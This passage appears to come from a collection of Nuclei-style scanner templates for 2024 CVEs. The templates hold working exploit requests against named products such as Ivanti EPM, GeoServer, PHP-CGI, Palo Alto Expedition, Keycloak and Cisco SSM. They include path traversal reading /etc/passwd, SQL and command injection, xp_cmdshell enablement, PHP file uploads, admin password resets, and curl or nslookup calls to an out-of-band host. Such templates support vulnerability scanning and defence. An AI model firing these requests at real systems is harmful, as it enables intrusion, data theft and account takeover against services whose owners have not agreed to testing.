{{to_lower(rand_text_alpha(5))}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["responseHeader","system.properties","solr.script","solr.solr.home"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-33575","info":{"name":"User Meta WP Plugin < 3.1 - Sensitive Information Exposure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/user-meta/views/debug.php"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"um-debug<br/>\")"],"condition":"and"}]}]},{"id":"CVE-2024-38816","info":{"name":"WebMvc.fn/WebFlux.fn - Path Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/static/link/%2e%2e/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"regex","part":"content_type","regex":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-39713","info":{"name":"Rocket.Chat - Server-Side Request Forgery (SSRF)","severity":"high"},"requests":[{"raw":["POST /api/v1/livechat/sms-incoming/twilio HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"From\": \"5551123456782\",\n  \"To\": \"5551987654323\",\n  \"Body\": \"SMS message\",\n  \"NumMedia\": 1,\n  \"MediaUrl0\":\"http://{{interactsh-url}}\",\n  \"MediaContentType0\":\"application/json\"\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<Response></Response>"]},{"type":"word","part":"content_type","words":["text/xml"]},{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2024-45488","info":{"name":"SafeGuard for Privileged Passwords < 7.5.2 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/RSTS/UserLogin/LoginController?response_type=token&redirect_uri=https%3A%2F%2Flocalhost&loginRequestStep=6&csrfTokenTextbox=aaa"],"headers":{"Cookie":"CsrfToken=aaa; stsIdentity0={{code_response}}"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["access_token=","RelyingPartyUrl"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-1709","info":{"name":"ConnectWise ScreenConnect 23.9.7 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/SetupWizard.aspx/{{string}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["SetupWizardPage","ContentPanel SetupWizard"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"kval","part":"header","kval":["Server"]}]}]},{"id":"CVE-2024-0305","info":{"name":"Ncast busiFacade - Remote Command Execution","severity":"high"},"requests":[{"raw":["POST /classes/common/busiFacade.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{\"name\":\"ping\",\"serviceName\":\"SysManager\",\"userTransaction\":false,\"param\":[\"ping 127.0.0.1 | id\"]}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)","#str"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-31850","info":{"name":"CData Arc < 23.4.8839 - Path Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.rst"],"matchers":[{"type":"word","internal":true,"words":["<title>CData Arc"]}]},{"raw":["GET /ui/..\\src\\getSettings.rsb?@json HTTP/1.1\nHost: {{Hostname}}\nReferer: {{RootURL}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"items\":[{",":\"true\"","notifyemail"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-9463","info":{"name":"PaloAlto Networks Expedition - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /API/convertCSVtoParquet.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nram=watchTowr`curl+{{interactsh-url}}`\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["Undefined index: taskID"]}]}]},{"id":"CVE-2024-35219","info":{"name":"OpenAPI Generator <= 7.5.0 - Arbitrary File Read/Delete","severity":"high"},"requests":[{"raw":["POST /api/gen/clients/csharp HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"authorizationValue\": {\n    \"keyName\": \"string\",\n    \"type\": \"string\",\n    \"value\": \"string\"\n  },\n \"openAPIUrl\": \"https://raw.githubusercontent.com/OpenAPITools/openapi-generator/master/modules/openapi-generator/src/test/resources/2_0/petstore.yaml\",\n   \"options\": {\"outputFolder\":\"../../../../../../usr/share/pixmaps/\"},\n  \"spec\": {}\n}\n"],"matchers":[{"type":"word","part":"body","words":["code","link"],"condition":"and","internal":true}],"extractors":[{"type":"json","name":"code","part":"body","json":[".code"],"internal":true}]},{"raw":["GET /api/gen/download/{{code}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["pixmaps/debian-logo.png"]}]}]},{"id":"CVE-2024-22320","info":{"name":"IBM Operational Decision Manager - Java Deserialization","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/res/login.jsf?javax.faces.ViewState={{generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"base64\")}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["javax.servlet.ServletException"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2024-6586","info":{"name":"Lightdash v0.1024.6 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST /api/v1/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"email\":\"{{username}}\",\"password\":\"{{password}}\"}\n"]},{"raw":["GET /api/v1/org/projects HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"json","name":"projectuuid","part":"body","json":[".results[0].projectUuid"],"internal":true}]},{"raw":["POST /api/v1/projects/{{projectuuid}}/dashboards HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\":\"Test\",\"description\":\"Test\",\"tiles\":[]}\n"],"extractors":[{"type":"json","name":"dashuuid","part":"body","json":[".results.uuid"],"internal":true}]},{"raw":["PATCH /api/v1/dashboards/{{dashuuid}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"tiles\":[{\"uuid\":\"00000000-0000-0000-0000-000000000000\",\"x\":0,\"y\":0,\"h\":9,\"w\":15,\"type\":\"markdown\",\"properties\":{\"title\":\"title\",\"hideTitle\":false,\"content\":\"<iframe src=\\\"http://{{interactsh-url}}\\\">frame</iframe>\\n\\n<img src=\\\"http://{{interactsh-url}}\\\">img</img>\\n\"}}],\"filters\":{\"dimensions\":[],\"metrics\":[],\"tableCalculations\":[]},\"name\":\"my dashboard\"}\n"],"matchers":[{"type":"word","part":"body","words":["\"status\":\"ok\""],"internal":true}]},{"raw":["POST /api/v1/dashboards/{{dashuuid}}/export HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"queryFilters\":\"\",\"gridWidth\":1400}\n"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, \"http\")","contains(interactsh_request, \"connect.sid=\")","contains(body, \"status\\\":\\\"ok\")"],"condition":"and"}]}]},{"id":"CVE-2024-39914","info":{"name":"FOG Project < 1.5.10.34 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /management/export.php?filename=$(echo+'<?php+echo+md5({{num}});+?>'+>+{{filename}}.php)&type=pdf HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfogguiuser=fog&nojson=2\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"No HTML files!\",\"HTMLDOC\")","contains(content_type, \"application/pdf\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /management/{{filename}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"{{md5(num)}}\")","contains(content_type, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-4879","info":{"name":"ServiceNow UI Macros - Template Injection","severity":"unknown"},"requests":[{"raw":["GET /login.do?jvar_page_title=<style><j:jelly%20xmlns:j=\"jelly\"%20xmlns:g=%27glide%27><g:evaluate>gs.addErrorMessage(1337*1337);</g:evaluate></j:jelly></style> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<div class=\"outputmsg_text\">1787569</div>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-9465","info":{"name":"Palo Alto Expedition - SQL Injection","severity":"high"},"requests":[{"raw":["POST /bin/configurations/parsers/Checkpoint/CHECKPOINT.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=get&type=existing_ruleBases&project=pandbRBAC\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"ruleBasesNames\")"],"condition":"and","internal":true}]},{"raw":["@timeout: 20s\nPOST /bin/configurations/parsers/Checkpoint/CHECKPOINT.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=import&type=test&project=pandbRBAC&signatureid=1%20AND%20(SELECT%201234%20FROM%20(SELECT(SLEEP(6)))test)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-29973","info":{"name":"Zyxel NAS326 Firmware < V5.21(AAZF.17)C0 - Command Injection","severity":"critical"},"requests":[{"raw":["POST /cmd,/simZysh/register_main/setCookie HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei\n\n------WebKitFormBoundarygcflwtei\nContent-Disposition: form-data; name=\"c0\"\n\nstorage_ext_cgi CGIGetExtStoInfo None) and False or __import__(\"subprocess\").check_output(\"echo {{string}}\", shell=True)#\n------WebKitFormBoundarygcflwtei--\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, 'errmsg0\": \"OK')","contains(header, 'application/json')","contains(body, '{{string}}')"],"condition":"and"}]}]},{"id":"CVE-2024-5522","info":{"name":"WordPress HTML5 Video Player < 2.5.27 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/h5vp/v1/video/0?id='+union all select concat(0x64617461626173653a,1,0x7c76657273696f6e3a,2,0x7c757365723a,md5({{num}})),2,3,4,5,6,7,8-- -"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-6095","info":{"name":"LocalAI - Partial Local File Read","severity":"medium"},"requests":[{"raw":["POST /models/apply HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"url\":\"file:///etc/passwd\"}\n"],"extractors":[{"type":"json","part":"body","name":"uuid","internal":true,"json":[".uuid"]}]},{"raw":["GET /models/jobs/{{uuid}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[": cannot unmarshal !!str `root:x:...`"]},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-29824","info":{"name":"Ivanti EPM - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /WSStatusEvents/EventHandler.asmx HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/soap+xml\n\n<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<soap12:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soap12=\"http://www.w3.org/2003/05/soap-envelope\">\n  <soap12:Body>\n    <UpdateStatusEvents xmlns=\"http://tempuri.org/\">\n      <deviceID>string</deviceID>\n      <actions>\n        <Action name=\"string\" code=\"0\" date=\"0\" type=\"96\" user=\"string\" configguid=\"string\" location=\"string\">\n          <status>GoodApp=1|md5='; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'nslookup {{interactsh-url}}'--</status>\n        </Action>\n      </actions>\n    </UpdateStatusEvents>\n  </soap12:Body>\n</soap12:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"content_type","words":["application/soap+xml"]},{"type":"word","part":"body","words":["UpdateStatusEventsResponse"]},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-23334","info":{"name":"aiohttp - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/static/../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"header","words":["aiohttp","application/octet-stream"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-31982","info":{"name":"XWiki < 4.10.20 - Remote code execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/xwiki/bin/get/Main/DatabaseSearch?outputSyntax=plain&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22Hello%20from%22%20%2B%20%22%20search%20text%3A%22%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20","{{BaseURL}}/bin/get/Main/DatabaseSearch?outputSyntax=plain&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22Hello%20from%22%20%2B%20%22%20search%20text%3A%22%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20"],"skip-variables-check":true,"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["contains_all(body, \"Hello from search text:42</title>\", \"<title>RSS feed\")","contains(header, \"text/javascript\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-44849","info":{"name":"Qualitor <= 8.24 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /html/ad/adfilestorage/request/checkAcesso.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------QUALITORspaceCVEspace2024space44849\n\n-----------------------------QUALITORspaceCVEspace2024space44849\nContent-Disposition: form-data; name=\"idtipo\"\n\n2\n-----------------------------QUALITORspaceCVEspace2024space44849\nContent-Disposition: form-data; name=\"nmfilestorage\"\n\n\n-----------------------------QUALITORspaceCVEspace2024space44849\nContent-Disposition: form-data; name=\"nmdiretoriorede\"\n\n.\n-----------------------------QUALITORspaceCVEspace2024space44849\nContent-Disposition: form-data; name=\"nmbucket\"\n\n\n-----------------------------QUALITORspaceCVEspace2024space44849\nContent-Disposition: form-data; name=\"nmaccesskey\"\n\n\n-----------------------------QUALITORspaceCVEspace2024space44849\nContent-Disposition: form-data; name=\"nmkeyid\"\n\n\n-----------------------------QUALITORspaceCVEspace2024space44849\nContent-Disposition: form-data; name=\"fleArquivo\"; filename=\"{{filename}}.php\"\n\n<?php echo md5({{num}}); ?>\n-----------------------------QUALITORspaceCVEspace2024space44849\nContent-Disposition: form-data; name=\"cdfilestorage\"\n\n\n-----------------------------QUALITORspaceCVEspace2024space44849--\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"parent.showQAlert(\\'Upload\", \"showQAlert\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /html/ad/adfilestorage/request/{{filename}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"{{md5(num)}}\")","contains(content_type, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-7340","info":{"name":"W&B Weave Server - Remote Arbitrary File Leak","severity":"high"},"requests":[{"raw":["GET /__weave/file/tmp/weave/fs/../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"header","words":["application/octet-stream","filename=passwd"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-36401","info":{"name":"GeoServer RCE in Evaluating Property Name Expressions","severity":"critical"},"requests":[{"raw":["GET /geoserver/web/wicket/bookmarkable/org.geoserver.web.demo.MapPreviewPage HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"extractors":[{"type":"regex","name":"typename","part":"body","group":1,"regex":["typeName=([^&\\]]+)"],"internal":true}]},{"raw":["@timeout 20s\nGET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames={{name}}&valueReference=exec(java.lang.Runtime.getRuntime(),'curl+{{interactsh-url}}') HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"content_type","words":["application/xml"]}]}]},{"id":"CVE-2024-29269","info":{"name":"Telesquare TLR-2005KSH  - Remote Command Execution","severity":"critical"},"requests":[{"raw":["GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=ifconfig HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<CmdResult>","</xml>","Ethernet","inet"],"condition":"and"},{"type":"word","part":"header","words":["text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-24809","info":{"name":"Traccar - Unrestricted File Upload","severity":"high"},"requests":[{"raw":["POST /api/users HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\": \"{{name}}\", \"email\": \"{{email}}\", \"password\": \"{{password}}\", \"totpKey\": null}\n"],"matchers":[{"type":"word","part":"body","words":["\"administrator\":","\"fixedEmail\""],"condition":"and","internal":true}]},{"raw":["POST /api/session HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded;charset=UTF-8\n\nemail={{email}}&password={{password}}\n"],"matchers":[{"type":"word","part":"body","words":["\"deviceReadonly\":","\"expirationTime\":"],"condition":"and","internal":true}]},{"raw":["POST /api/devices HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\": \"{{unique}}\", \"uniqueId\": \"{{unique}}\"}\n"],"matchers":[{"type":"word","part":"body","words":["\"calendarId\"","\"groupId\":"],"condition":"and","internal":true}],"extractors":[{"type":"json","part":"body","name":"value","internal":true,"json":[".id"]}]},{"raw":["POST /api/devices/{{value}}/image HTTP/1.1\nHost: {{Hostname}}\nContent-Type: image/srHtgGrc\n\n{{str}}\n"],"extractors":[{"type":"regex","part":"body","name":"filename","internal":true,"regex":["device\\.([a-zA-Z]+)"]}],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"application/json\")"],"condition":"and","internal":true}]},{"raw":["PUT /api/devices/{{value}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"id\": {{value}}, \"attributes\": {\"deviceImage\": \"device.png\"}, \"groupId\": 0, \"calendarId\": 0, \"name\": \"test\", \"uniqueId\": \"{{unique}}/../../../../../opt/traccar/modern\", \"status\": \"offline\", \"lastUpdate\": null, \"positionId\": 0, \"phone\": null, \"model\": null, \"contact\": null, \"category\": null, \"disabled\": false, \"expirationTime\": null}\n"],"matchers":[{"type":"word","part":"body","words":["\"deviceImage\":","\"expirationTime\":"],"condition":"and","internal":true}]},{"raw":["POST /api/devices/{{value}}/image HTTP/1.1\nHost: {{Hostname}}\nContent-Type: image/srHtgGrc\n\n{{str}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"application/json\")"],"condition":"and","internal":true}]},{"raw":["GET /{{filename}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200"]}]}]},{"id":"CVE-2024-24112","info":{"name":"Exrick XMall - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /item/list?draw=1&order%5B0%5D%5Bcolumn%5D=1&order%5B0%5D%5Bdir%5D=desc)a+union+select+updatexml(1,concat(0x7e,{{md5(num)}},0x7e),1)%23;&start=0&length=1&search%5Bvalue%5D=&search%5Bregex%5D=false&cid=-1&_=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}","MySQLSyntaxErrorException"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-28995","info":{"name":"SolarWinds Serv-U - Directory Traversal","severity":"high"},"requests":[{"raw":["GET /?InternalDir=/../../../../windows&InternalFile=win.ini HTTP/1.1\nHost: {{Hostname}}\n","GET /?InternalDir=\\..\\..\\..\\..\\etc&InternalFile=passwd HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"dsl","dsl":["contains(header, \"Serv-U\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-4358","info":{"name":"Progress Telerik Report Server - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /Startup/Register HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nUsername={{user}}&Password={{pass}}&ConfirmPassword={{pass}}&Email={{email}}&FirstName={{firstname}}&LastName={{lastname}}\n","POST /Token HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ngrant_type=password&username={{user}}&password={{pass}}\n"],"matchers":[{"type":"dsl","dsl":["contains(content_type_2, \"application/json\")","contains_all(body_2, \"access_token\", \"userName\", \"token_type\")","status_code_2 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"token","part":"body_2","group":1,"regex":["\"access_token\":\"([A-Z0-9a-z_-]+)\""],"internal":true},{"type":"dsl","dsl":["\"Username: \"+ user","\"Password: \"+ pass"]}]}]},{"id":"CVE-2024-43360","info":{"name":"ZoneMinder - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout 20s\nGET /zm/index.php?sort=if(now()=sysdate()%2Csleep(6)%2C0)&order=desc&limit=20&view=request&request=watch&mid=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","contains_all(body,\"result\\\":\\\"Ok\", \"rows\\\":[\")","contains(content_type,\"application/json\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-22207","info":{"name":"Fastify Swagger-UI - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/documentation/playwright.config.js"],"matchers-condition":"and","matchers":[{"type":"word","words":["module.exports","defineConfig"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-3656","info":{"name":"Keycloak < 24.0.5 - Broken Access Control","severity":"high"},"requests":[{"raw":["GET /realms/{{realm}}/protocol/openid-connect/auth?client_id=security-admin-console&redirect_uri={{Scheme}}%3A%2F%2f{{Hostname}}%2Fadmin%2F{{realm}}%2Fconsole%2F&state=1&response_mode=query&response_type=code&scope=openid&nonce=1&code_challenge_method=S256&code_challenge={{code_challenge}} HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"tabid","part":"body","internal":true,"regex":["&tab_id=(\\w+)&"],"group":1}]},{"raw":["GET /realms/{{realm}}/login-actions/authenticate?client_id=security-admin-console&tab_id={{tabid}}&client_data=eyJydCI6ImNvZGUiLCJybSI6InF1ZXJ5Iiwic3QiOiIxIn0= HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"auth_url","part":"body","internal":true,"regex":["\"login.disabled = true; return true;\" action=\"(.*?)\""],"group":1}]},{"raw":["POST {{replace(auth_url,'&amp;','&')}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&credentialId=&\n"],"extractors":[{"type":"dsl","name":"codevalue","internal":true,"dsl":["replace_regex(http_3_location,\".*&code=\",\"\")"]}]},{"raw":["POST /realms/{{realm}}/protocol/openid-connect/token HTTP/1.1\nHost: {{Hostname}}\nContent-type: application/x-www-form-urlencoded\n\ncode={{codevalue}}&grant_type=authorization_code&client_id=security-admin-console&redirect_uri={{Scheme}}%3A%2F%2F{{Hostname}}%2Fadmin%2F{{realm}}%2Fconsole%2F&code_verifier={{code_verifier}}&\n"],"extractors":[{"type":"json","part":"body","name":"access_token","json":[".access_token"],"internal":true}]},{"raw":["POST /admin/realms/{{realm}}/testLDAPConnection HTTP/1.1\nHost: {{Hostname}}\nauthorization: Bearer {{access_token}}\ncontent-type: application/json\n\n{\n    \"action\": \"testConnection\",\n    \"connectionUrl\": \"ldap://{{interactsh-url}}/\",\n    \"bindDn\": \"cn=admin,dc=example,dc=com\",\n    \"bindCredential\": \"password\",\n    \"useTruststoreSpi\": \"ldapsOnly\",\n    \"connectionTimeout\": \"5000\"\n}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, \"dns\")"]},{"type":"word","part":"body","words":["HTTP 403 Forbidden"],"negative":true}]}]},{"id":"CVE-2024-45195","info":{"name":"Apache OFBiz - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /webtools/control/forgotPassword/xmldsdump HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\noutpath=./themes/common-theme/webapp/common-theme/&maxrecords=&filename={{filename}}.txt&entityFrom_i18n=&entityFrom=&entityThru_i18n=&entityThru=&entitySyncId=&preConfiguredSetName=&entityName=UserLogin&entityName=CreditCard\n","GET /common/{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["<?xml version=","entity-engine-xml"],"condition":"and"},{"type":"word","part":"content_type_2","words":["text/plain"]}]}]},{"id":"CVE-2024-20419","info":{"name":"Cisco SSM On-Prem <= 8-202206 - Password Reset Account Takeover","severity":"critical"},"requests":[{"raw":["GET /backend/settings/oauth_adfs?hostname=polar HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","words":["enabled","redirect"],"condition":"and","internal":true}]},{"raw":["POST /backend/reset_password/generate_code HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\nX-Xsrf-Token: {{urldecode('{{http_1_xsrf-token}}')}}\n\n{\"uid\": \"admin\"}\n"],"matchers":[{"type":"word","words":["uid","auth_token"],"condition":"and","internal":true}],"extractors":[{"type":"json","part":"body","name":"auth_token","json":[".auth_token"],"internal":true}]},{"raw":["POST /backend/reset_password HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\nX-Xsrf-Token: {{urldecode('{{http_1_xsrf-token}}')}}\n\n{\"uid\": \"admin\",\"auth_token\":\"{{auth_token}}\", \"password\":\"{{password}}\",\"password_confirmation\":\"{{password}}\",\"common_name\":\"\"}\n"],"matchers":[{"type":"word","words":["\"status\":\"OK\""],"condition":"and","internal":true}]},{"raw":["POST /backend/auth/identity/callback HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nX-Xsrf-Token: {{urldecode('{{http_1_xsrf-token}}')}}\nContent-Type: application/json\n\n{\"username\":\"{{username}}\",\"password\":\"{{password}}\"}\n"],"matchers":[{"type":"word","part":"body","words":["session_key","role"],"condition":"and"}],"extractors":[{"type":"dsl","dsl":["\"USER: \"+ username","\"PASS: \"+ password"]}]}]},{"id":"CVE-2024-4577","info":{"name":"PHP CGI - Argument Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input","{{BaseURL}}/index.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input","{{BaseURL}}/test.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input","{{BaseURL}}/test.hello?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"],"body":"<?php echo md5(\"CVE-2024-4577\"); ?>\n","stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["3f2ba4ab3b260f4c2dc61a6fac7c3e8a"]}]}]},{"id":"CVE-2024-41667","info":{"name":"OpenAM<=15.0.3 FreeMarker - Template Injection","severity":"high"},"requests":[{"raw":["POST /openam/json/realms/root/authenticate HTTP/1.1\nHost: {{Hostname}}\nAccept-API-Version: protocol=1.0,resource=2.1\nX-Password: anonymous\nX-Username: anonymous\nContent-Type: application/json\nX-Requested-With: XMLHttpRequest\nX-NoSession: true\n"],"matchers":[{"type":"word","part":"body","words":["authId"],"internal":true}],"extractors":[{"type":"regex","name":"authId","part":"body","group":1,"regex":["\"authId\":\"(.*?)\""],"internal":true}]},{"raw":["POST /openam/json/realms/root/authenticate HTTP/1.1\nHost: {{Hostname}}\nAccept-API-Version: protocol=1.0,resource=2.1\nX-Password: anonymous\nX-Username: anonymous\nContent-Type: application/json\nAccept: application/json, text/javascript, */*; q=0.01\nX-Requested-With: XMLHttpRequest\nX-NoSession: true\n\n{\"authId\":\"{{authId}}\",\"template\":\"\",\"stage\":\"DataStore1\",\"header\":\"Sign in to 